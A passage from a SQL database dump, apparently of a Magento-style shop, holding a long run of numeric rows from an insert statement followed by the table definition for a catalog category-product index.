0),(1004,7,566,0),(1005,7,567,0),(1006,7,568,0),(1007,7,569,0),(1008,7,570,0),(1009,7,571,0),(1010,7,572,0),(1011,7,573,0),(1012,3,573,0),(1013,7,574,0),(1014,3,574,0),(1015,7,575,0),(1016,3,575,0),(1017,7,576,0),(1018,3,576,0),(1019,7,577,0),(1020,3,577,0),(1021,7,578,0),(1022,3,578,0),(1023,7,579,0),(1024,3,579,0),(1025,7,580,0),(1026,3,580,0),(1027,7,581,0),(1028,3,581,0),(1029,7,582,0),(1030,3,582,0),(1031,7,583,0),(1032,3,583,0),(1033,7,584,0),(1034,3,584,0),(1035,7,585,0),(1036,3,585,0),(1037,7,586,0),(1038,3,586,0),(1039,7,587,0),(1040,3,587,0),(1041,7,588,0),(1042,3,588,0),(1043,7,589,0),(1044,3,589,0),(1045,7,590,0),(1046,3,590,0),(1047,7,591,0),(1048,3,591,0),(1049,7,592,0),(1050,3,592,0),(1051,7,593,0),(1052,3,593,0),(1053,7,594,0),(1054,3,594,0),(1055,7,595,0),(1056,3,595,0),(1057,7,596,0),(1058,3,596,0),(1059,7,597,0),(1060,3,597,0),(1061,7,598,0),(1062,3,598,0),(1063,7,599,0),(1064,3,599,0),(1065,7,600,0),(1066,7,601,0),(1067,7,602,0),(1068,7,603,0),(1069,7,604,0),(1070,7,605,0),(1071,7,606,0),(1072,7,607,0),(1073,7,608,0),(1074,7,609,0),(1075,7,610,0),(1076,7,611,0),(1077,7,612,0),(1078,7,613,0),(1079,7,614,0),(1080,7,615,0),(1081,7,616,0),(1082,7,617,0),(1083,7,618,0),(1084,7,619,0),(1085,7,620,0),(1086,7,621,0),(1087,7,622,0),(1088,7,623,0),(1089,7,624,0),(1090,7,625,0),(1091,7,626,0),(1092,7,627,0),(1093,7,628,0),(1094,7,629,0),(1095,7,630,0),(1096,7,631,0),(1097,7,632,0),(1098,7,633,0),(1099,7,634,0),(1100,7,635,0),(1101,7,636,0),(1102,7,637,0),(1103,7,638,0),(1104,7,639,0),(1105,7,640,0),(1106,7,641,0),(1107,7,642,0),(1108,7,643,0),(1109,7,644,0),(1110,7,645,0),(1111,7,646,0),(1112,7,647,0),(1113,7,648,0),(1114,7,649,0),(1115,7,650,0),(1116,7,651,0),(1117,3,651,0),(1118,7,652,0),(1119,3,652,0),(1120,7,653,0),(1121,3,653,0),(1122,7,654,0),(1123,3,654,0),(1124,7,655,0),(1125,3,655,0),(1126,7,656,0),(1127,3,656,0),(1128,7,657,0),(1129,3,657,0),(1130,7,658,0),(1131,3,658,0),(1132,7,659,0),(1133,3,659,0),(1134,7,660,0),(1135,7,661,0),(1136,7,662,0),(1137,7,663,0),(1138,7,664,0),(1139,7,665,0),(1140,7,666,0),(1141,7,667,0),(1142,7,668,0),(1143,7,669,0),(1144,7,670,0),(1145,7,671,0),(1146,7,672,0),(1147,7,673,0),(1148,7,674,0),(1149,3,674,0),(1150,7,675,0),(1151,3,675,0),(1152,7,676,0),(1153,3,676,0),(1154,7,677,0),(1155,3,677,0),(1156,7,678,0),(1157,3,678,0),(1158,7,679,0),(1159,3,679,0),(1160,7,680,0),(1161,3,680,0),(1162,7,681,0),(1163,3,681,0),(1164,7,682,0),(1165,3,682,0),(1166,7,683,0),(1167,7,684,0),(1168,7,685,0),(1169,7,686,0),(1170,7,687,0),(1171,7,688,0),(1172,7,689,0),(1173,7,690,0),(1174,7,691,0),(1175,7,692,0),(1176,7,693,0),(1177,7,694,0),(1178,7,695,0),(1179,7,696,0),(1180,7,697,0),(1181,7,698,0),(1182,7,699,0),(1183,7,700,0),(1184,12,701,0),(1185,12,702,0),(1186,12,703,0),(1187,12,704,0),(1188,12,705,0),(1189,12,706,0),(1190,12,707,0),(1191,12,708,0),(1192,12,709,0),(1193,12,710,0),(1194,12,711,0),(1195,12,712,0),(1196,12,713,0),(1197,12,714,0),(1198,12,715,0),(1199,12,716,0),(1200,12,717,0),(1201,12,718,0),(1202,12,719,0),(1203,12,720,0),(1204,12,721,0),(1205,12,722,0),(1206,12,723,0),(1207,12,724,0),(1208,12,725,0),(1209,12,726,0),(1210,12,727,0),(1211,12,728,0),(1212,12,729,0),(1213,12,730,0),(1214,12,731,0),(1215,12,732,0),(1216,12,733,0),(1217,12,734,0),(1218,12,735,0),(1219,12,736,0),(1220,12,737,0),(1221,3,737,0),(1222,12,738,0),(1223,3,738,0),(1224,12,739,0),(1225,3,739,0),(1226,12,740,0),(1227,3,740,0),(1228,12,741,0),(1229,3,741,0),(1230,12,742,0),(1231,3,742,0),(1232,12,743,0),(1233,3,743,0),(1234,12,744,0),(1235,3,744,0),(1236,12,745,0),(1237,3,745,0),(1238,12,746,0),(1239,12,747,0),(1240,12,748,0),(1241,12,749,0),(1242,12,750,0),(1243,12,751,0),(1244,12,752,0),(1245,12,753,0),(1246,12,754,0),(1247,12,755,0),(1248,12,756,0),(1249,12,757,0),(1250,12,758,0),(1251,12,759,0),(1252,12,760,0),(1253,12,761,0),(1254,12,762,0),(1255,12,763,0),(1256,12,764,0),(1257,3,764,0),(1258,12,765,0),(1259,3,765,0),(1260,12,766,0),(1261,3,766,0),(1262,12,767,0),(1263,3,767,0),(1264,12,768,0),(1265,3,768,0),(1266,12,769,0),(1267,3,769,0),(1268,12,770,0),(1269,3,770,0),(1270,12,771,0),(1271,3,771,0),(1272,12,772,0),(1273,3,772,0),(1274,12,773,0),(1275,3,773,0),(1276,12,774,0),(1277,3,774,0),(1278,12,775,0),(1279,3,775,0),(1280,12,776,0),(1281,3,776,0),(1282,12,777,0),(1283,3,777,0),(1284,12,778,0),(1285,3,778,0),(1286,12,779,0),(1287,3,779,0),(1288,12,780,0),(1289,3,780,0),(1290,12,781,0),(1291,3,781,0),(1292,12,782,0),(1293,12,783,0),(1294,12,784,0),(1295,12,785,0),(1296,12,786,0),(1297,12,787,0),(1298,12,788,0),(1299,12,789,0),(1300,12,790,0),(1301,12,791,0),(1302,12,792,0),(1303,12,793,0),(1304,12,794,0),(1305,12,795,0),(1306,12,796,0),(1307,3,796,0),(1308,12,797,0),(1309,3,797,0),(1310,12,798,0),(1311,3,798,0),(1312,12,799,0),(1313,3,799,0),(1314,12,800,0),(1315,3,800,0),(1316,12,801,0),(1317,3,801,0),(1318,12,802,0),(1319,3,802,0),(1320,12,803,0),(1321,3,803,0),(1322,12,804,0),(1323,3,804,0),(1324,12,805,0),(1325,12,806,0),(1326,12,807,0),(1327,12,808,0),(1328,12,809,0),(1329,12,810,0),(1330,12,811,0),(1331,12,812,0),(1332,17,813,0),(1333,17,814,0),(1334,17,815,0),(1335,17,816,0),(1336,17,817,0),(1337,17,818,0),(1338,17,819,0),(1339,17,820,0),(1340,17,821,0),(1341,17,822,0),(1342,17,823,0),(1343,17,824,0),(1344,17,825,0),(1345,17,826,0),(1346,17,827,0),(1347,17,828,0),(1348,17,829,0),(1349,17,830,0),(1350,17,831,0),(1351,17,832,0),(1352,17,833,0),(1353,17,834,0),(1354,17,835,0),(1355,17,836,0),(1356,17,837,0),(1357,17,838,0),(1358,17,839,0),(1359,17,840,0),(1360,17,841,0),(1361,17,842,0),(1362,17,843,0),(1363,17,844,0),(1364,17,845,0),(1365,17,846,0),(1366,17,847,0),(1367,17,848,0),(1368,17,849,0),(1369,17,850,0),(1370,17,851,0),(1371,17,852,0),(1372,17,853,0),(1373,17,854,0),(1374,17,855,0),(1375,17,856,0),(1376,17,857,0),(1377,17,858,0),(1378,17,859,0),(1379,17,860,0),(1380,17,861,0),(1381,17,862,0),(1382,17,863,0),(1383,17,864,0),(1384,17,865,0),(1385,17,866,0),(1386,17,867,0),(1387,17,868,0),(1388,17,869,0),(1389,17,870,0),(1390,17,871,0),(1391,17,872,0),(1392,17,873,0),(1393,17,874,0),(1394,17,875,0),(1395,17,876,0),(1396,17,877,0),(1397,17,878,0),(1398,17,879,0),(1399,17,880,0),(1400,17,881,0),(1401,17,882,0),(1402,17,883,0),(1403,17,884,0),(1404,17,885,0),(1405,17,886,0),(1406,17,887,0),(1407,17,888,0),(1408,17,889,0),(1409,17,890,0),(1410,17,891,0),(1411,17,892,0),(1412,17,893,0),(1413,17,894,0),(1414,17,895,0),(1415,17,896,0),(1416,17,897,0),(1417,17,898,0),(1418,17,899,0),(1419,17,900,0),(1420,17,901,0),(1421,17,902,0),(1422,17,903,0),(1423,17,904,0),(1424,17,905,0),(1425,17,906,0),(1426,17,907,0),(1427,17,908,0),(1428,17,909,0),(1429,17,910,0),(1430,17,911,0),(1431,17,912,0),(1432,17,913,0),(1433,17,914,0),(1434,17,915,0),(1435,17,916,0),(1436,17,917,0),(1437,17,918,0),(1438,17,919,0),(1439,17,920,0),(1440,17,921,0),(1441,17,922,0),(1442,17,923,0),(1443,17,924,0),(1444,17,925,0),(1445,17,926,0),(1446,17,927,0),(1447,17,928,0),(1448,17,929,0),(1449,22,930,0),(1450,22,931,0),(1451,22,932,0),(1452,22,933,0),(1453,22,934,0),(1454,22,935,0),(1455,22,936,0),(1456,22,937,0),(1457,22,938,0),(1458,22,939,0),(1459,22,940,0),(1460,22,941,0),(1461,22,942,0),(1462,22,943,0),(1463,22,944,0),(1464,22,945,0),(1465,22,946,0),(1466,22,947,0),(1467,22,948,0),(1468,22,949,0),(1469,22,950,0),(1470,22,951,0),(1471,22,952,0),(1472,22,953,0),(1473,22,954,0),(1474,22,955,0),(1475,22,956,0),(1476,22,957,0),(1477,22,958,0),(1478,22,959,0),(1479,22,960,0),(1480,22,961,0),(1481,22,962,0),(1482,22,963,0),(1483,22,964,0),(1484,22,965,0),(1485,22,966,0),(1486,22,967,0),(1487,22,968,0),(1488,22,969,0),(1489,22,970,0),(1490,22,971,0),(1491,22,972,0),(1492,22,973,0),(1493,22,974,0),(1494,22,975,0),(1495,22,976,0),(1496,22,977,0),(1497,22,978,0),(1498,22,979,0),(1499,22,980,0),(1500,22,981,0),(1501,22,982,0),(1502,22,983,0),(1503,22,984,0),(1504,22,985,0),(1505,22,986,0),(1506,22,987,0),(1507,22,988,0),(1508,22,989,0),(1509,22,990,0),(1510,22,991,0),(1511,22,992,0),(1512,22,993,0),(1513,22,994,0),(1514,22,995,0),(1515,22,996,0),(1516,22,997,0),(1517,22,998,0),(1518,22,999,0),(1519,22,1000,0),(1520,22,1001,0),(1521,22,1002,0),(1522,22,1003,0),(1523,22,1004,0),(1524,22,1005,0),(1525,22,1006,0),(1526,22,1007,0),(1527,22,1008,0),(1528,22,1009,0),(1529,22,1010,0),(1530,22,1011,0),(1531,22,1012,0),(1532,22,1013,0),(1533,22,1014,0),(1534,22,1015,0),(1535,22,1016,0),(1536,22,1017,0),(1537,22,1018,0),(1538,22,1019,0),(1539,22,1020,0),(1540,22,1021,0),(1541,22,1022,0),(1542,22,1023,0),(1543,22,1024,0),(1544,22,1025,0),(1545,22,1026,0),(1546,22,1027,0),(1547,22,1028,0),(1548,22,1029,0),(1549,22,1030,0),(1550,22,1031,0),(1551,22,1032,0),(1552,22,1033,0),(1553,22,1034,0),(1554,22,1035,0),(1555,22,1036,0),(1556,22,1037,0),(1557,22,1038,0),(1558,22,1039,0),(1559,22,1040,0),(1560,22,1041,0),(1561,22,1042,0),(1562,22,1043,0),(1563,22,1044,0),(1564,22,1045,0),(1565,22,1046,0),(1566,22,1047,0),(1567,22,1048,0),(1568,22,1049,0),(1569,22,1050,0),(1570,22,1051,0),(1571,22,1052,0),(1572,22,1053,0),(1573,22,1054,0),(1574,22,1055,0),(1575,22,1056,0),(1576,22,1057,0),(1577,22,1058,0),(1578,22,1059,0),(1579,22,1060,0),(1580,22,1061,0),(1581,22,1062,0),(1582,22,1063,0),(1583,22,1064,0),(1584,22,1065,0),(1585,22,1066,0),(1586,22,1067,0),(1587,22,1068,0),(1588,22,1069,0),(1589,22,1070,0),(1590,22,1071,0),(1591,22,1072,0),(1592,22,1073,0),(1593,22,1074,0),(1594,22,1075,0),(1595,22,1076,0),(1596,22,1077,0),(1597,22,1078,0),(1598,22,1079,0),(1599,22,1080,0),(1600,22,1081,0),(1601,22,1082,0),(1602,22,1083,0),(1603,22,1084,0),(1604,22,1085,0),(1605,22,1086,0),(1606,22,1087,0),(1607,22,1088,0),(1608,22,1089,0),(1609,22,1090,0),(1610,22,1091,0),(1611,22,1092,0),(1612,22,1093,0),(1613,22,1094,0),(1614,22,1095,0),(1615,22,1096,0),(1616,22,1097,0),(1617,22,1098,0),(1618,22,1099,0),(1619,22,1100,0),(1620,22,1101,0),(1621,22,1102,0),(1622,22,1103,0),(1623,22,1104,0),(1624,22,1105,0),(1625,22,1106,0),(1626,22,1107,0),(1627,22,1108,0),(1628,22,1109,0),(1629,15,1110,0),(1630,15,1111,0),(1631,15,1112,0),(1632,15,1113,0),(1633,15,1114,0),(1634,15,1115,0),(1635,15,1116,0),(1636,15,1117,0),(1637,15,1118,0),(1638,15,1119,0),(1639,15,1120,0),(1640,15,1121,0),(1641,15,1122,0),(1642,15,1123,0),(1643,15,1124,0),(1644,15,1125,0),(1645,15,1126,0),(1646,15,1127,0),(1647,15,1128,0),(1648,15,1129,0),(1649,15,1130,0),(1650,15,1131,0),(1651,15,1132,0),(1652,15,1133,0),(1653,15,1134,0),(1654,15,1135,0),(1655,15,1136,0),(1656,15,1137,0),(1657,15,1138,0),(1658,15,1139,0),(1659,15,1140,0),(1660,15,1141,0),(1661,15,1142,0),(1662,15,1143,0),(1663,15,1144,0),(1664,15,1145,0),(1665,15,1146,0),(1666,15,1147,0),(1667,15,1148,0),(1668,15,1149,0),(1669,15,1150,0),(1670,15,1151,0),(1671,15,1152,0),(1672,15,1153,0),(1673,15,1154,0),(1674,15,1155,0),(1675,15,1156,0),(1676,15,1157,0),(1677,15,1158,0),(1678,15,1159,0),(1679,15,1160,0),(1680,15,1161,0),(1681,15,1162,0),(1682,15,1163,0),(1683,15,1164,0),(1684,15,1165,0),(1685,15,1166,0),(1686,15,1167,0),(1687,15,1168,0),(1688,15,1169,0),(1689,15,1170,0),(1690,15,1171,0),(1691,15,1172,0),(1692,15,1173,0),(1693,15,1174,0),(1694,15,1175,0),(1695,15,1176,0),(1696,15,1177,0),(1697,15,1178,0),(1698,15,1179,0),(1699,15,1180,0),(1700,15,1181,0),(1701,15,1182,0),(1702,15,1183,0),(1703,15,1184,0),(1704,15,1185,0),(1705,15,1186,0),(1706,15,1187,0),(1707,15,1188,0),(1708,15,1189,0),(1709,15,1190,0),(1710,15,1191,0),(1711,15,1192,0),(1712,15,1193,0),(1713,15,1194,0),(1714,15,1195,0),(1715,15,1196,0),(1716,15,1197,0),(1717,15,1198,0),(1718,15,1199,0),(1719,15,1200,0),(1720,15,1201,0),(1721,15,1202,0),(1722,15,1203,0),(1723,15,1204,0),(1724,15,1205,0),(1725,15,1206,0),(1726,15,1207,0),(1727,15,1208,0),(1728,15,1209,0),(1729,15,1210,0),(1730,15,1211,0),(1731,15,1212,0),(1732,15,1213,0),(1733,15,1214,0),(1734,15,1215,0),(1735,15,1216,0),(1736,15,1217,0),(1737,15,1218,0),(1738,15,1219,0),(1739,15,1220,0),(1740,15,1221,0),(1741,15,1222,0),(1742,15,1223,0),(1743,15,1224,0),(1744,15,1225,0),(1745,15,1226,0),(1746,15,1227,0),(1747,15,1228,0),(1748,15,1229,0),(1749,15,1230,0),(1750,15,1231,0),(1751,15,1232,0),(1752,15,1233,0),(1753,15,1234,0),(1754,15,1235,0),(1755,15,1236,0),(1756,15,1237,0),(1757,15,1238,0),(1758,15,1239,0),(1759,15,1240,0),(1760,15,1241,0),(1761,15,1242,0),(1762,15,1243,0),(1763,15,1244,0),(1764,15,1245,0),(1765,15,1246,0),(1766,15,1247,0),(1767,15,1248,0),(1768,15,1249,0),(1769,15,1250,0),(1770,15,1251,0),(1771,15,1252,0),(1772,15,1253,0),(1773,15,1254,0),(1774,15,1255,0),(1775,15,1256,0),(1776,15,1257,0),(1777,15,1258,0),(1778,15,1259,0),(1779,15,1260,0),(1780,15,1261,0),(1781,15,1262,0),(1782,18,813,0),(1783,18,814,0),(1784,18,815,0),(1785,18,816,0),(1786,18,817,0),(1787,18,818,0),(1788,18,819,0),(1789,18,820,0),(1790,18,821,0),(1791,18,822,0),(1792,18,823,0),(1793,18,824,0),(1794,18,825,0),(1795,18,826,0),(1796,18,827,0),(1797,18,828,0),(1798,18,829,0),(1799,18,830,0),(1800,18,831,0),(1801,18,832,0),(1802,18,833,0),(1803,18,834,0),(1804,18,835,0),(1805,18,836,0),(1806,18,837,0),(1807,18,838,0),(1808,18,839,0),(1809,18,840,0),(1810,18,841,0),(1811,18,842,0),(1812,18,843,0),(1813,18,844,0),(1814,18,845,0),(1815,18,846,0),(1816,18,847,0),(1817,18,848,0),(1818,18,849,0),(1819,18,850,0),(1820,18,851,0),(1821,18,852,0),(1822,18,853,0),(1823,18,854,0),(1824,18,855,0),(1825,18,856,0),(1826,18,857,0),(1827,18,858,0),(1828,18,859,0),(1829,18,860,0),(1830,18,861,0),(1831,18,862,0),(1832,18,863,0),(1833,18,864,0),(1834,18,865,0),(1835,18,866,0),(1836,18,867,0),(1837,18,868,0),(1838,18,869,0),(1839,18,870,0),(1840,18,871,0),(1841,18,872,0),(1842,18,873,0),(1843,18,874,0),(1844,18,875,0),(1845,18,876,0),(1846,18,877,0),(1847,18,878,0),(1848,18,879,0),(1849,18,880,0),(1850,18,881,0),(1851,18,882,0),(1852,18,883,0),(1853,18,884,0),(1854,18,885,0),(1855,18,886,0),(1856,18,887,0),(1857,18,888,0),(1858,18,889,0),(1859,18,890,0),(1860,18,891,0),(1861,18,892,0),(1862,18,893,0),(1863,18,894,0),(1864,18,895,0),(1865,18,896,0),(1866,18,897,0),(1867,18,898,0),(1868,18,899,0),(1869,18,900,0),(1870,18,901,0),(1871,18,902,0),(1872,18,903,0),(1873,18,904,0),(1874,18,905,0),(1875,18,906,0),(1876,18,907,0),(1877,18,908,0),(1878,18,909,0),(1879,18,910,0),(1880,18,911,0),(1881,18,912,0),(1882,18,913,0),(1883,18,914,0),(1884,18,915,0),(1885,18,916,0),(1886,18,917,0),(1887,18,918,0),(1888,18,919,0),(1889,18,920,0),(1890,18,921,0),(1891,18,922,0),(1892,18,923,0),(1893,18,924,0),(1894,18,925,0),(1895,18,926,0),(1896,18,927,0),(1897,18,928,0),(1898,18,929,0),(1899,24,930,0),(1900,24,931,0),(1901,24,932,0),(1902,24,933,0),(1903,24,934,0),(1904,24,935,0),(1905,24,936,0),(1906,24,937,0),(1907,24,938,0),(1908,24,939,0),(1909,24,940,0),(1910,24,941,0),(1911,24,942,0),(1912,24,943,0),(1913,24,944,0),(1914,24,945,0),(1915,24,946,0),(1916,24,947,0),(1917,24,948,0),(1918,24,949,0),(1919,24,950,0),(1920,24,951,0),(1921,24,952,0),(1922,24,953,0),(1923,24,954,0),(1924,24,955,0),(1925,24,956,0),(1926,24,957,0),(1927,24,958,0),(1928,24,959,0),(1929,24,960,0),(1930,24,961,0),(1931,24,962,0),(1932,24,963,0),(1933,24,964,0),(1934,24,965,0),(1935,24,966,0),(1936,24,967,0),(1937,24,968,0),(1938,24,969,0),(1939,24,970,0),(1940,24,971,0),(1941,24,972,0),(1942,24,973,0),(1943,24,974,0),(1944,24,975,0),(1945,24,976,0),(1946,24,977,0),(1947,24,978,0),(1948,24,979,0),(1949,24,980,0),(1950,24,981,0),(1951,24,982,0),(1952,24,983,0),(1953,24,984,0),(1954,24,985,0),(1955,24,986,0),(1956,24,987,0),(1957,24,988,0),(1958,24,989,0),(1959,24,990,0),(1960,24,991,0),(1961,24,992,0),(1962,24,993,0),(1963,24,994,0),(1964,24,995,0),(1965,24,996,0),(1966,24,997,0),(1967,24,998,0),(1968,24,999,0),(1969,24,1000,0),(1970,24,1001,0),(1971,24,1002,0),(1972,24,1003,0),(1973,24,1004,0),(1974,24,1005,0),(1975,24,1006,0),(1976,24,1007,0),(1977,24,1008,0),(1978,24,1009,0),(1979,24,1010,0),(1980,24,1011,0),(1981,24,1012,0),(1982,24,1013,0),(1983,24,1014,0),(1984,24,1015,0),(1985,24,1016,0),(1986,24,1017,0),(1987,24,1018,0),(1988,24,1019,0),(1989,24,1020,0),(1990,24,1021,0),(1991,24,1022,0),(1992,24,1023,0),(1993,24,1024,0),(1994,24,1025,0),(1995,24,1026,0),(1996,24,1027,0),(1997,24,1028,0),(1998,24,1029,0),(1999,24,1030,0),(2000,24,1031,0),(2001,24,1032,0),(2002,24,1033,0),(2003,24,1034,0),(2004,24,1035,0),(2005,24,1036,0),(2006,24,1037,0),(2007,24,1038,0),(2008,24,1039,0),(2009,24,1040,0),(2010,24,1041,0),(2011,24,1042,0),(2012,24,1043,0),(2013,24,1044,0),(2014,24,1045,0),(2015,24,1046,0),(2016,24,1047,0),(2017,24,1048,0),(2018,24,1049,0),(2019,24,1050,0),(2020,24,1051,0),(2021,24,1052,0),(2022,24,1053,0),(2023,24,1054,0),(2024,24,1055,0),(2025,24,1056,0),(2026,24,1057,0),(2027,24,1058,0),(2028,24,1059,0),(2029,24,1060,0),(2030,24,1061,0),(2031,24,1062,0),(2032,24,1063,0),(2033,24,1064,0),(2034,24,1065,0),(2035,24,1066,0),(2036,24,1067,0),(2037,24,1068,0),(2038,24,1069,0),(2039,24,1070,0),(2040,24,1071,0),(2041,24,1072,0),(2042,24,1073,0),(2043,24,1074,0),(2044,24,1075,0),(2045,24,1076,0),(2046,24,1077,0),(2047,24,1078,0),(2048,24,1079,0),(2049,24,1080,0),(2050,24,1081,0),(2051,24,1082,0),(2052,24,1083,0),(2053,24,1084,0),(2054,24,1085,0),(2055,24,1086,0),(2056,24,1087,0),(2057,24,1088,0),(2058,24,1089,0),(2059,24,1090,0),(2060,24,1091,0),(2061,24,1092,0),(2062,24,1093,0),(2063,24,1094,0),(2064,24,1095,0),(2065,24,1096,0),(2066,24,1097,0),(2067,24,1098,0),(2068,24,1099,0),(2069,24,1100,0),(2070,24,1101,0),(2071,24,1102,0),(2072,24,1103,0),(2073,24,1104,0),(2074,24,1105,0),(2075,24,1106,0),(2076,24,1107,0),(2077,24,1108,0),(2078,24,1109,0);

--
-- Table structure for table `catalog_category_product_index`
--

CREATE TABLE `catalog_category_product_index` (
  `category_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) DEFAULT NULL COMMENT 'Position',
  `is_parent` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Is Parent',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `visibility` smallint(5) unsigned NOT NULL COMMENT 'Visibility',
  PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  KEY `CAT_CTGR_PRD_IDX_PRD_ID_STORE_ID_CTGR_ID_VISIBILITY` (`product_id`,`store_id`,`category_id`,`visibility`),
  KEY `CAT_CTGR_PRD_IDX_STORE_ID_CTGR_ID_VISIBILITY_IS_PARENT_POSITION` (`store_id`,`category_id`,`visibility`,`is_parent`,`position`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Product Index';

--
